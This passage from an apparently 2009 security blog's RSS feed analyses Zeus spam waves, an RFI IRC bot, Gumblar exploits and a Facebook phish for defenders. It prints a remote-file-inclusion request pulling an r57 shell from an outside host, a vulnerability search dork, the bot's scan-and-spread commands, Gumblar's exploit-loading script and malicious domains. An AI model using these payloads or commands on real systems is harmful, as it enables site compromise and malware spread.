Microsoft DirectShow &amp; Office Web Components zero days<br />
Microsoft Snapshot Viewer MS08-041</p>
<p><a title="virustotal" href="http://www.virustotal.com/analisis/24c8ecc77dff561aaff74b1e4f7aed70aac6ef5c15fa4bbdf0e7000b0c0dadbf-1248735684" target="_blank">Virustotal Payload 1</a> &amp; <a title="threatexpert" href="http://www.threatexpert.com/report.aspx?md5=bd7c8e3151af1236035c1d7c22b78347" target="_blank">ThreatExpert Payload 1</a> -- SilentBanker -- Banking Trojan</p>
<p><a title="virustotal" href="http://www.virustotal.com/analisis/9c49899330c50b0a5fa709e70a8e73948cfd307881b9525256dfb800cdb86a30-1248813790" target="_blank">Virustotal Payload 2</a> &amp; <a title="threatexpert tedroo" href="http://www.threatexpert.com/report.aspx?md5=354f64c8daa3d12421cfb9f358b1843a" target="_blank">ThreatExpert Payload 2</a> -- Tedroo -- SpamBot</p>
<p><a title="wepawet" href="http://wepawet.cs.ucsb.edu/view.php?hash=4a1845cee23563ea96cdb367e491d668&amp;t=1248737159&amp;type=js" target="_blank">Wepawet PDF exploit</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.martinsecurity.net/2009/07/28/nine-ball-followup-part-1/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Finding the Unknown &#8211; Detecting Emailed Malware Waves</title>
		<link>http://www.martinsecurity.net/2009/06/29/finding-the-unknown-detecting-emailed-malware-waves/</link>
		<comments>http://www.martinsecurity.net/2009/06/29/finding-the-unknown-detecting-emailed-malware-waves/#comments</comments>
		<pubDate>Tue, 30 Jun 2009 02:34:59 +0000</pubDate>
		<dc:creator>martinse</dc:creator>
				<category><![CDATA[Intelligence]]></category>
		<category><![CDATA[Intrusion Detection]]></category>
		<category><![CDATA[Malware scripts and other formats]]></category>
		<category><![CDATA[IDS]]></category>
		<category><![CDATA[instrusion detection]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[wsnpoem]]></category>
		<category><![CDATA[zbot]]></category>
		<category><![CDATA[zeus]]></category>

		<guid isPermaLink="false">http://www.martinsecurity.net/?p=338</guid>
		<description><![CDATA[In a previous post I discussed using the technique of watching for the transfer of executable files around the network as a method of intrusion detection. This is a great way of discovering machines that were attacked where IDS failed to detect the exploit(s) due to obfuscation. Another method I&#8217;d like to highlight is looking [...]]]></description>
			<content:encoded><![CDATA[<p>In a <a href="http://www.martinsecurity.net/2008/11/26/finding-the-unknown-on-your-network/" target="_blank">previous post</a> I discussed using the technique of watching for the transfer of executable files around the network as a method of intrusion detection. This is a great way of discovering machines that were attacked where IDS failed to detect the exploit(s) due to obfuscation.</p>
<p>Another method I&#8217;d like to highlight is looking for password protect zip files. Like the transfer of executables, password protected zips are perfectly legitimate. Lets take Zeus as an example.</p>
<p>Zeus/Zbot/WSNpoem spreads both via web exploits and SPAM runs. In order to get the payload past AV detection, the malware author encrypts the file and provides the password in the body of the message. AV cannot scan within the archive and can only match on a specific signature for the encrypted archive itself.</p>
<p>There was one of these runs earlier this week (June 24th) which is easily detected by a signature that looks for password protected zips. You might think that a signature like this would generate a lot of events, and it does, however it is easy to sort through and find the attacks. The file name used in this attack was &#8220;djellow.zip&#8221;.  A quick search leads us to <a title="Abuse.ch - Zeus" href="http://www.abuse.ch/?p=1576" target="_blank">this article</a> over at abuse.ch.</p>
<p>The messages were sent from a number of IPs, including:</p>
<p>95.25.108.154<br />
95.24.3.119<br />
89.248.207.69<br />
88.227.199.86<br />
86.105.126.142<br />
85.100.177.112<br />
84.92.85.139<br />
84.204.112.15<br />
84.104.97.35<br />
83.5.144.32<br />
78.176.8.64<br />
78.166.216.115<br />
78.161.81.160<br />
78.158.51.103<br />
77.77.15.208<br />
77.255.254.214<br />
76.175.144.40<br />
72.179.5.10<br />
71.124.158.42<br />
209.239.38.24<br />
201.22.7.148<br />
201.15.77.229<br />
201.0.136.67<br />
200.68.63.226<br />
200.56.79.179<br />
190.175.133.38<br />
189.78.200.43<br />
188.47.4.252<br />
187.14.9.68</p>
<p>The two worst offenders are Brazil and Turkey with 5 IPs each.</p>
<table style="border-collapse: collapse; height: 92px;" border="0" cellspacing="2" cellpadding="2" width="808">
<col style="width: 32pt;" width="42"></col>
<col style="width: 85pt;" width="113"></col>
<col style="width: 95pt;" width="126"></col>
<col style="width: 48pt;" width="64"></col>
<col style="width: 346pt;" width="461"></col>
<tbody>
<tr style="height: 12.75pt;" height="17">
<td style="height: 12.75pt; width: 32pt;" width="42" height="17" align="right">ASN</p>
<p>18881</td>
<td style="width: 85pt;" width="113">IP</p>
<p>201.22.7.148<span> </span></td>
<td style="width: 95pt;" width="126">Prefix</p>
<p>201.22.0.0/18<span> </span></td>
<td style="width: 48pt;" width="64">Country</p>
<p>BR<span> </span></td>
<td style="width: 346pt;" width="461">Description</p>
<p>Global Village Telecom</td>
</tr>
<tr style="height: 12.75pt;" height="17">
<td style="height: 12.75pt;" height="17" align="right">8167</td>
<td><span> </span>201.15.77.229<span> </span></td>
<td><span> </span>201.15.64.0/18<span> </span></td>
<td><span> </span>BR<span> </span></td>
<td><span> </span>TELESC &#8211; Telecomunicacoes de Santa   Catarina SA</td>
</tr>
<tr style="height: 12.75pt;" height="17">
<td style="height: 12.75pt;" height="17" align="right">27699</td>
<td><span> </span>201.0.136.67<span> </span></td>
<td><span> </span>201.0.0.0/16<span> </span></td>
<td><span> </span>BR<span> </span></td>
<td><span> </span>TELECOMUNICACOES DE SAO PAULO S/A   &#8211; TELESP</td>
</tr>
<tr style="height: 12.75pt;" height="17">
<td style="height: 12.75pt;" height="17" align="right">27699</td>
<td><span> </span>189.78.200.43<span> </span></td>
<td><span> </span>189.78.0.0/16<span> </span></td>
<td><span> </span>BR<span> </span></td>
<td><span> </span>TELECOMUNICACOES DE SAO PAULO S/A   &#8211; TELESP</td>
</tr>
<tr style="height: 12.75pt;" height="17">
<td style="height: 12.75pt;" height="17" align="right">7738</td>
<td><span> </span>187.14.9.68<span> </span></td>
<td><span> </span>187.14.0.0/19<span> </span></td>
<td><span> </span>BR<span> </span></td>
<td><span> </span>Telecomunicacoes da Bahia S.A.</td>
</tr>
</tbody>
</table>
<table style="border-collapse: collapse; width: 606pt;" border="0" cellspacing="2" cellpadding="2" width="806">
<col style="width: 32pt;" width="42"></col>
<col style="width: 85pt;" width="113"></col>
<col style="width: 95pt;" width="126"></col>
<col style="width: 48pt;" width="64"></col>
<col style="width: 346pt;" width="461"></col>
<tbody>
<tr style="height: 12.75pt;" height="17">
<td style="height: 12.75pt; width: 32pt;" width="42" height="17" align="right">9121</td>
<td style="width: 85pt;" width="113"><span> </span>88.227.199.86<span> </span></td>
<td style="width: 95pt;" width="126"><span> </span>88.227.128.0/17<span> </span></td>
<td style="width: 48pt;" width="64"><span> </span>TR<span> </span></td>
<td style="width: 346pt;" width="461"><span> </span>TTNET TTnet Autonomous System</td>
</tr>
<tr style="height: 12.75pt;" height="17">
<td style="height: 12.75pt;" height="17" align="right">9121</td>
<td><span> </span>85.100.177.112<span> </span></td>
<td><span> </span>85.100.128.0/17<span> </span></td>
<td><span> </span>TR<span> </span></td>
<td><span> </span>TTNET TTnet Autonomous System</td>
</tr>
<tr style="height: 12.75pt;" height="17">
<td style="height: 12.75pt;" height="17" align="right">9121</td>
<td><span> </span>78.176.8.64<span> </span></td>
<td><span> </span>78.176.0.0/17<span> </span></td>
<td><span> </span>TR<span> </span></td>
<td><span> </span>TTNET TTnet Autonomous System</td>
</tr>
<tr style="height: 12.75pt;" height="17">
<td style="height: 12.75pt;" height="17" align="right">9121</td>
<td><span> </span>78.166.216.115<span> </span></td>
<td><span> </span>78.166.128.0/17<span> </span></td>
<td><span> </span>TR<span> </span></td>
<td><span> </span>TTNET TTnet Autonomous System</td>
</tr>
<tr style="height: 12.75pt;" height="17">
<td style="height: 12.75pt;" height="17" align="right">9121</td>
<td><span> </span>78.161.81.160<span> </span></td>
<td><span> </span>78.161.0.0/17<span> </span></td>
<td><span> </span>TR<span> </span></td>
<td><span> </span>TTNET TTnet Autonomous System</td>
</tr>
</tbody>
</table>
<p>Attacks using password protected zips can now be identified and their sources uncovered without having to rely solely on exploit or attack related signatures. All that&#8217;s needed is a detective hat and knowledge of current threats.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.martinsecurity.net/2009/06/29/finding-the-unknown-detecting-emailed-malware-waves/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>This blog is now a honeypot!</title>
		<link>http://www.martinsecurity.net/2009/06/07/this-blog-is-now-a-honeypoteste-blog-es-un-honeypot-ahora/</link>
		<comments>http://www.martinsecurity.net/2009/06/07/this-blog-is-now-a-honeypoteste-blog-es-un-honeypot-ahora/#comments</comments>
		<pubDate>Mon, 08 Jun 2009 01:54:49 +0000</pubDate>
		<dc:creator>martinse</dc:creator>
				<category><![CDATA[Intelligence]]></category>
		<category><![CDATA[Malware scripts and other formats]]></category>
		<category><![CDATA[rfi]]></category>

		<guid isPermaLink="false">http://www.martinsecurity.net/?p=321</guid>
		<description><![CDATA[As I was perusing my logs today on a lazy Sunday afternoon I found I was being attacked by more RFI bots than usual. To my surprise I realized it is because of my previous post on controlling RFI bots.  In my last post I included a dork that is frequently scanned for, and in [...]]]></description>
			<content:encoded><![CDATA[<p>As I was perusing my logs today on a lazy Sunday afternoon I found I was being attacked by more RFI bots than usual. To my surprise I realized it is because of my <a title="Controlling an RFI bot" href="http://www.martinsecurity.net/2009/06/04/controlling-an-rfi-bot/" target="_blank">previous post</a> on controlling RFI bots.  In my last post I included a dork that is frequently scanned for, and in doing so made my own blog a target! Now whenever a bot searches for the dork I mentioned, my blog will be returned as a possible target. The site is not vulnerable of course so I thought I would turn this to my/our advantage.</p>
<p>I&#8217;ve cobbled together a little script that will read my web logs and spit out all the attack attempts and some stats as well. The script may result in some false positives so please take that into consideration. The suspected attacks and stats will be updated once a day and if things go well I may seed some more dorks into the blog to generate more hits.</p>
<p>Hopefully this will be a good source of live data for anyone wanting to research RFI attacks, please keep in mind that most of the attacking domains are compromised web servers themselves.</p>
<p>The details are on the left sidebar under &#8220;RFI Attacks&#8221;.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.martinsecurity.net/2009/06/07/this-blog-is-now-a-honeypoteste-blog-es-un-honeypot-ahora/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Controlling an RFI bot &#8211; RFI pt3</title>
		<link>http://www.martinsecurity.net/2009/06/04/controlling-an-rfi-bot/</link>
		<comments>http://www.martinsecurity.net/2009/06/04/controlling-an-rfi-bot/#comments</comments>
		<pubDate>Thu, 04 Jun 2009 22:50:17 +0000</pubDate>
		<dc:creator>martinse</dc:creator>
				<category><![CDATA[Forensics]]></category>
		<category><![CDATA[Intelligence]]></category>
		<category><![CDATA[Malware scripts and other formats]]></category>
		<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[irc bot]]></category>
		<category><![CDATA[r57]]></category>
		<category><![CDATA[rfi]]></category>
		<category><![CDATA[shell]]></category>

		<guid isPermaLink="false">http://www.martinsecurity.net/?p=278</guid>
		<description><![CDATA[Lets delve a little deeper into the Osirys IRC bot which I initially discussed in part 1. First I will illustrate how the attacker finds and exploits web servers, then I will discuss how ISPs can get involved and remove these bots from their networks. First the attacker issues a command to the bot to [...]]]></description>
			<content:encoded><![CDATA[<p>Lets delve a little deeper into the Osirys IRC bot which I initially discussed in part 1. First I will illustrate how the attacker finds and exploits web servers, then I will discuss how ISPs can get involved and remove these bots from their networks.</p>
<p>First the attacker issues a command to the bot to begin scanning. The scan will search for the dork &#8220;index.php?sayfa=&#8221; which will find hosts that are <a title="acyhost rfi" href="http://www.securityfocus.com/bid/28231/info" target="_blank">vulnerable to this attack</a>.</p>
<p>&lt;[attacker]&gt; !rfi index.php?sayfa= &#8220;index.php?sayfa=&#8221; -p 75</p>
<p>The bot then searches several search engines to find sites that meet the attacker&#8217;s criteria and begins trying to exploit them.</p>
<p>&lt;bot&gt; [*] RFI Scan started -&gt; 75 sites/process<br />
&lt;bot&gt; [+] Bug: index.php?sayfa=<br />
&lt;bot&gt; [+] Dork: &#8220;index.php?sayfa=&#8221;<br />
&lt;bot&gt; [~] &gt;ABACHO : 0 &gt; &#8220;index.php?sayfa=&#8221;<br />
&lt;bot&gt; [~] &gt;WEB.DE : 0 &gt; &#8220;index.php?sayfa=&#8221;<br />
&lt;bot&gt; [~] &gt;YAHOO : 0 &gt; &#8220;index.php?sayfa=&#8221;<br />
&lt;bot&gt; [~] &gt;ASK : 126 &gt; &#8220;index.php?sayfa=&#8221;<br />
&lt;bot&gt; [~] &gt;ALLTHEWEB : 3084 &gt; &#8220;index.php?sayfa=&#8221;<br />
&lt;bot&gt; [~] &gt;UOL : 390 &gt; &#8220;index.php?sayfa=&#8221;<br />
&lt;bot&gt; [~] &gt;MSN : 2997 &gt; &#8220;index.php?sayfa=&#8221;<br />
&lt;bot&gt; [~] &gt;ALTAVISTA : 630 &gt; &#8220;index.php?sayfa=&#8221;<br />
&lt;bot&gt; [~] &gt;WEB.DE : 0 &gt; &#8220;index.php?sayfa=&#8221;<br />
&lt;bot&gt; [~] &gt;GOOGLE : 0 &gt; &#8220;index.php?sayfa=&#8221;<br />
&lt;bot&gt; [~] &gt;MSN : 3057 &gt; &#8220;index.php?sayfa=&#8221;<br />
&lt;bot&gt; [~] &gt;ASK : 363 &gt; &#8220;index.php?sayfa=&#8221;<br />
&lt;bot&gt; [~] &gt;UOL : 225 &gt; &#8220;index.php?sayfa=&#8221;<br />
&lt;bot&gt; [~] &gt;VIRGILIO : 0 &gt; &#8220;index.php?sayfa=&#8221;<br />
&lt;bot&gt; [~] &gt;LYCOS : 1731 &gt; &#8220;index.php?sayfa=&#8221;<br />
&lt;bot&gt; [~] &gt;ABACHO : 0 &gt; &#8220;index.php?sayfa=&#8221;<br />
&lt;bot&gt; [*] &gt;EXPLOITABLES: 4561 &#8220;index.php?sayfa=&#8221;<br />
&lt;bot&gt; [+] ExPLoItIng STARTED !!</p>
<p>A vulnerable host is found and the attacker is now able to control the host using their shell, which in this case is in r57.txt.</p>
<p>&lt;bot&gt; (safe: ON) (os: WINNT) http://[removed]/EN/index.php?sayfa=http://www.tos-belarus.org/data/r57.txt???<br />
&lt;bot&gt; (uname -a) Windows NT HERA 5.0 build 2195<br />
&lt;bot&gt; (hdd space) free: ( 4.92 Mb) used: ( 84.00 Kb) tot: ( 5.00 Mb)<br />
&lt;bot&gt; [+] Trying to spread ..<br />
&lt;bot&gt; [%] _/ Exploiting 100 / 4561<br />
ISPs can use the following to interact with the bot and remove it from their network. This bot is running on my own IRC server for testing purposes.</p>
<p>Removal of the bot requires administrative credentials which are available in the script. Looking at the below configuration sample user &#8220;andy&#8221; may issue administrative commands to the bot.</p>
<p>my @admins = (&#8220;andy&#8221;);<br />
my $killpwd   = &#8220;adminpass&#8221;; #Password to Kill the Bot</p>
<p>Show bot commands</p>
<p>&lt;andy&gt; !help<br />
&lt;RFI[13]&gt; [!] !response  &gt; Test if the RFI Response is working<br />
&lt;RFI[13]&gt; [*] !chid &lt;new rfi-id&gt;  &gt; Change the RFI-Response<br />
&lt;RFI[13]&gt; [*] !killme  &gt; KILL The Bot<br />
&lt;RFI[13]&gt; [!] !milw0rm rss  &gt; Get the last Milw0rm bugs<br />
&lt;RFI[13]&gt; [!] !new rfi bugs  &gt; Get the last 10 RFI bugs<br />
&lt;RFI[13]&gt; [!] !new lfi bugs  &gt; Get the last 10 LFI bugs<br />
&lt;RFI[13]&gt; [!] !new sql bugs  &gt; Get the last 10 SQL Injection bugs<br />
&lt;RFI[13]&gt; [!] !new rce bugs  &gt; Get the last 10 RCE bugs<br />
&lt;RFI[13]&gt; [!] !cari &lt;bug&gt; &lt;dork&gt; -p &lt;sites/proc&gt;  &gt; Start the RFI Scanner<br />
&lt;RFI[13]&gt; [!] !lfi &lt;bug&gt; &lt;dork&gt;  &gt; Start the LFI Scanner<br />
&lt;RFI[13]&gt; [!] !sql &lt;bug&gt; &lt;dork&gt; -p &lt;sites/proc&gt;  &gt; Start the SQL Injection Scanner<br />
&lt;RFI[13]&gt; [!] !rce &lt;bug&gt; &lt;dork&gt; -p &lt;sites/proc&gt;  &gt; Start the RCE Scanner<br />
&lt;RFI[13]&gt; [!] !mass[rfi/lfi/sql/rce] &lt;bug&gt; &lt;dork&gt; -p &lt;sites/proc&gt;  &gt; Start the Mass Scan<br />
&lt;RFI[13]&gt; [*] !cmd &lt;bashline&gt;  &gt; Gives command on the Bot&#8217;s shell. Ex: (!cmd id) (!cmd uname -a)<br />
&lt;RFI[13]&gt; [*] !sspread -s &lt;RFI_Vuln_site&gt;  &gt; To spread on a vulnerable host. Ex: (!spread -s www.h.com/a.php?bug=)<br />
&lt;RFI[13]&gt; [*] !admin add/remove &lt;nickname&gt;  &gt; To add/remove a nickname to/from the admin list<br />
&lt;RFI[13]&gt; [*] /msg RFI[13] !Sec ON/OFF -p &lt;pwd&gt;  &gt; To enable or disable Security Mode<br />
&lt;RFI[13]&gt; [*] /msg RFI[13] !Spread ON/OFF -p &lt;pwd&gt;  &gt; To enable or disable Spread Mode<br />
&lt;RFI[13]&gt; [!] !info  &gt; Get infos about the Bot</p>
<p>Gather information</p>
<p>&lt;andy&gt; !info<br />
&lt;RFI[13]&gt; [i] Release : v6 -Private IrcBot<br />
&lt;RFI[13]&gt; [i] Author  : Attacker Nickname<br />
&lt;RFI[13]&gt; [i] Contact : attacker@some.com<br />
&lt;RFI[13]&gt; [i] Uname -a: Linux ubuntu 2.6.28-11-server #42-Ubuntu SMP Fri Apr 17 02:45:36 UTC 2009 x86_64 GNU/Linux<br />
&lt;RFI[13]&gt; [i] Uptime  :  15:11:59 up 6 days, 50 min,  2 users,  load average: 0.05, 0.01, 0.00<br />
&lt;RFI[13]&gt; [i] Spread Mode: OFF<br />
&lt;RFI[13]&gt; [i] Security Mode: OFF</p>
<p>Remove the bot (admin only)</p>
<p>&lt;andy&gt; !cmd rm myscan2.txt (optional step if you know the name of the bot file)<br />
&lt;andy&gt; !killme<br />
&lt;RFI[13]&gt; [!] Bye Bye !<br />
* RFI[13] has quit IRC (Client exited)</p>
<p>Remember that simply removing the bot does not address the underlying vulnerability on the system that allowed it to be compromised.</p>
<p>This script also contains valuable investigative information in these two variables:</p>
<p>$auth = &#8220;attacker nickname&#8221;;<br />
$authmail = &#8220;attacker@some.com&#8221;;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.martinsecurity.net/2009/06/04/controlling-an-rfi-bot/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Exploits Employed by Gumblar</title>
		<link>http://www.martinsecurity.net/2009/05/22/exploits-employed-by-gumblar-exploits-employado-por-gumblar/</link>
		<comments>http://www.martinsecurity.net/2009/05/22/exploits-employed-by-gumblar-exploits-employado-por-gumblar/#comments</comments>
		<pubDate>Fri, 22 May 2009 22:32:20 +0000</pubDate>
		<dc:creator>martinse</dc:creator>
				<category><![CDATA[Intelligence]]></category>
		<category><![CDATA[Malware scripts and other formats]]></category>
		<category><![CDATA[cve-2008-2992]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[geno]]></category>
		<category><![CDATA[gumblar]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[martuz]]></category>

		<guid isPermaLink="false">http://www.martinsecurity.net/?p=308</guid>
		<description><![CDATA[Gumblar compromises clients using 2 different exploits. The first is a Adobe Acrobat PDF exploit CVE-2008-2992 and the second is a Adobe Flash exploit. Unfortunately I haven&#8217;t been able to figure out which Flash exploit is employed as decoding flash is not an expertise of mine. Here is the Wepawet output of the exploit script [...]]]></description>
			<content:encoded><![CDATA[<p>Gumblar compromises clients using 2 different exploits. The first is a Adobe Acrobat PDF exploit <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=2008-2992" target="_blank">CVE-2008-2992</a> and the second is a Adobe Flash exploit. Unfortunately I haven&#8217;t been able to figure out which Flash exploit is employed as decoding flash is not an expertise of mine.</p>
<p><a title="Wepawet Output, Gumblar" href="http://wepawet.iseclab.org/view.php?hash=6d564e599ad40773c9d1582bd1876c32&amp;t=1243014899&amp;type=js" target="_blank">Here is the Wepawet output</a> of the exploit script employed on each of the hostile domains I mentioned in my previous post.</p>
<p><a title="Gumblar exploit script" href="http://www.virustotal.com/analisis/356eda59c892dd52d11d400b3027c26a8cea648a8c9cc0895160068243a8d872-1243014387" target="_blank">Virus Total results for the main exploit script</a><br />
<a title="Virus Total, Gumblar" href="http://www.virustotal.com/analisis/1feb0cc84665dfab4ebf8bf123ea106cbefc0967e7d0446a003c4411a5d4b42f-1243015459" target="_blank">Virus Total results for the flash exploit</a><br />
<a title="Gumblar PDF exploit" href="http://www.virustotal.com/analisis/d64191d52a1531e3156e07416192c12a6e0256582730fe42d7e9138ef172ab9a-1243019894" target="_blank">Virus Total results for the PDF exploit</a></p>
<p>Exploit code is hosted at:</p>
<p>[gumblarserver].cn:8080/<br />
[gumblarserver].cn:8080/cache/flash.swf<br />
[gumblarserver].cn:8080/cache/readme.pdf</p>
<p>The following is the portion of the script that loads the exploits. The pdfswf() function executes and loads two iframes which reference the exploits.</p>
<p>function pdfswf()<br />
{<br />
PDF = new Array(&#8220;AcroPDF.PDF&#8221;, &#8220;PDF.PdfCtrl&#8221;);<br />
for(i in PDF)<br />
{<br />
try<br />
{<br />
obj = new ActiveXObject(PDF[i]);<br />
if (obj)<br />
{<br />
document.write(&#8216;&lt;iframe src=&#8221;cache/readme.pdf&#8221;&gt;&lt;/iframe&gt;&#8217;);<br />
}<br />
}<br />
catch(e){}<br />
}<br />
try<br />
{<br />
obj = new ActiveXObject(&#8220;ShockwaveFlash.ShockwaveFlash&#8221;);</p>
<p>if (obj)<br />
{<br />
document.write(&#8216;&lt;iframe src=&#8221;cache/flash.swf&#8221;&gt;&lt;/iframe&gt;&#8217;);<br />
}<br />
}<br />
catch(e){}<br />
}<br />
pdfswf();</p>
<p>On an interesting note, it appears the location of where the malware author might have compiled the flash file is embedded in the flash movie. This information is gathered from using: swfdump -atpdu flash.swf.</p>
<p>-=&gt; 65 72 47 43 3a 5c 44 6f 63 75 6d 65 6e 74 73 20  erGC:\Documents<br />
-=&gt; 61 6e 64 20 53 65 74 74 69 6e 67 73 5c 64 65 76  and Settings\dev<br />
-=&gt; 5c 44 65 73 6b 74 6f 70 5c 65 78 70 3b 3b 48 51  \Desktop\exp;;HQ</p>
<p>C:\Documents and Settings\dev\Desktop\exp</p>
<p>More Gumblar domains are hosted on 70.85.142.250 <a title="gumblar domains" href="http://www.robtex.com/ip/70.85.142.250.html" target="_blank">Link</a></p>
<p>I haven&#8217;t checked all of them, but these are the domains that I suspect are involved.</p>
<p>casinoslotbet.cn<br />
bigbestfind.cn<br />
autobestwestern.cn<br />
casinoslotbet.cn<br />
bigbestfind.cn<br />
findbigbrother.cn<br />
finditbig.cn<br />
giantbeaversdiet.cn<br />
giantnonfat.cn<br />
greatbethere.cn<br />
tvnameshop.cn</p>
<p>My personal favorite would have to be giantbeaversdiet.cn which hosts the binary payload that starts the chain of infection as described in <a title="Inside Gumblar Attack" href="http://www.martinsecurity.net/2009/05/20/inside-the-massive-gumblar-attacka-dentro-del-enorme-ataque-gumblar/" target="_blank">the previous post</a>. (hxxp://giantbeaversdiet.cn:8080/landig.php?id=8)</p>
<p>Who comes up with these domain names anyway??</p>
]]></content:encoded>
			<wfw:commentRss>http://www.martinsecurity.net/2009/05/22/exploits-employed-by-gumblar-exploits-employado-por-gumblar/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Facebook Phish &#8211; bestspace.be</title>
		<link>http://www.martinsecurity.net/2009/05/22/facebook-phish-bestspacebefacebook-phish-bestspacebe/</link>
		<comments>http://www.martinsecurity.net/2009/05/22/facebook-phish-bestspacebefacebook-phish-bestspacebe/#comments</comments>
		<pubDate>Fri, 22 May 2009 21:45:26 +0000</pubDate>
		<dc:creator>martinse</dc:creator>
				<category><![CDATA[Intelligence]]></category>
		<category><![CDATA[Malware scripts and other formats]]></category>
		<category><![CDATA[facebook]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[phish]]></category>

		<guid isPermaLink="false">http://www.martinsecurity.net/?p=305</guid>
		<description><![CDATA[Lets take a look at a facebook phish I received recently. I received this message from a friend: XXXXX sent you a message. Subject: Hi &#8220;Look at bestspace.be&#8221; I&#8217;ve included a screenshot of the site below, note that it looks like the facebook login page complete with poor spelling of &#8220;helps&#8221;. The form sends your [...]]]></description>
			<content:encoded><![CDATA[<p>Lets take a look at a facebook phish I received recently. I received this message from a friend:</p>
<p>XXXXX sent you a message.</p>
<p>Subject: Hi</p>
<p>&#8220;Look at bestspace.be&#8221;</p>
<p>I&#8217;ve included a screenshot of the site below, note that it looks like the facebook login page complete with poor spelling of &#8220;helps&#8221;.</p>
<div id="attachment_306" class="wp-caption alignnone" style="width: 310px"><a href="http://www.martinsecurity.net/wp-content/uploads/2009/05/facebook-phish.jpg"><img class="size-medium wp-image-306" title="facebook-phish" src="http://www.martinsecurity.net/wp-content/uploads/2009/05/facebook-phish-300x243.jpg" alt="bestspace.be" width="300" height="243" /></a><p class="wp-caption-text">bestspace.be</p></div>
<p>The form sends your stolen credentials back to bestspace.be for processing:</p>
<p>&lt;form method=&#8221;POST&#8221; action=&#8221;/?login_attempt=1&#8243;&gt;</p>
<p>Digging a little deeper we find this site is hosted on  211.95.78.98 <a href="http://www.robtex.com/ip/211.95.78.98.html" target="_blank">which hosts a few other malicious domains as well</a>:</p>
<p>degunter.cn<br />
daratop.cn</p>
<p>Doing a quick search for daratop.cn yields more hostile activity in the form of malware. Honeynet.cz has more <a title="honeynet.cz" href="http://www.honeynet.cz/?mmenu=statistiky&amp;smenu_int=7&amp;lang=cz&amp;vmetr=1&amp;country=cn&amp;tabstat=30" target="_blank">information</a> and so does the <a title="Malware Domains List" href="http://www.malwaredomainlist.com/mdl.php?search=daratop&amp;colsearch=All&amp;quantity=50" target="_blank">Malware Domains List</a>.</p>
<p>The registrant of daratop.cn is steven_lucas_2000@yahoo.com, a couple of searches for this email reveals many different attacks that this individual has been involved in.</p>
<p><a title="Dr Web" href="http://info.drweb.com/show/3248/en" target="_blank">Example 1<br />
</a><a title="fake site" href="http://db.aa419.org/fakebanksview.php?key=35003" target="_blank">Exmaple 2</a></p>
<p>In closing, all of these sites are hostile and should be blocked and avoided.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.martinsecurity.net/2009/05/22/facebook-phish-bestspacebefacebook-phish-bestspacebe/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

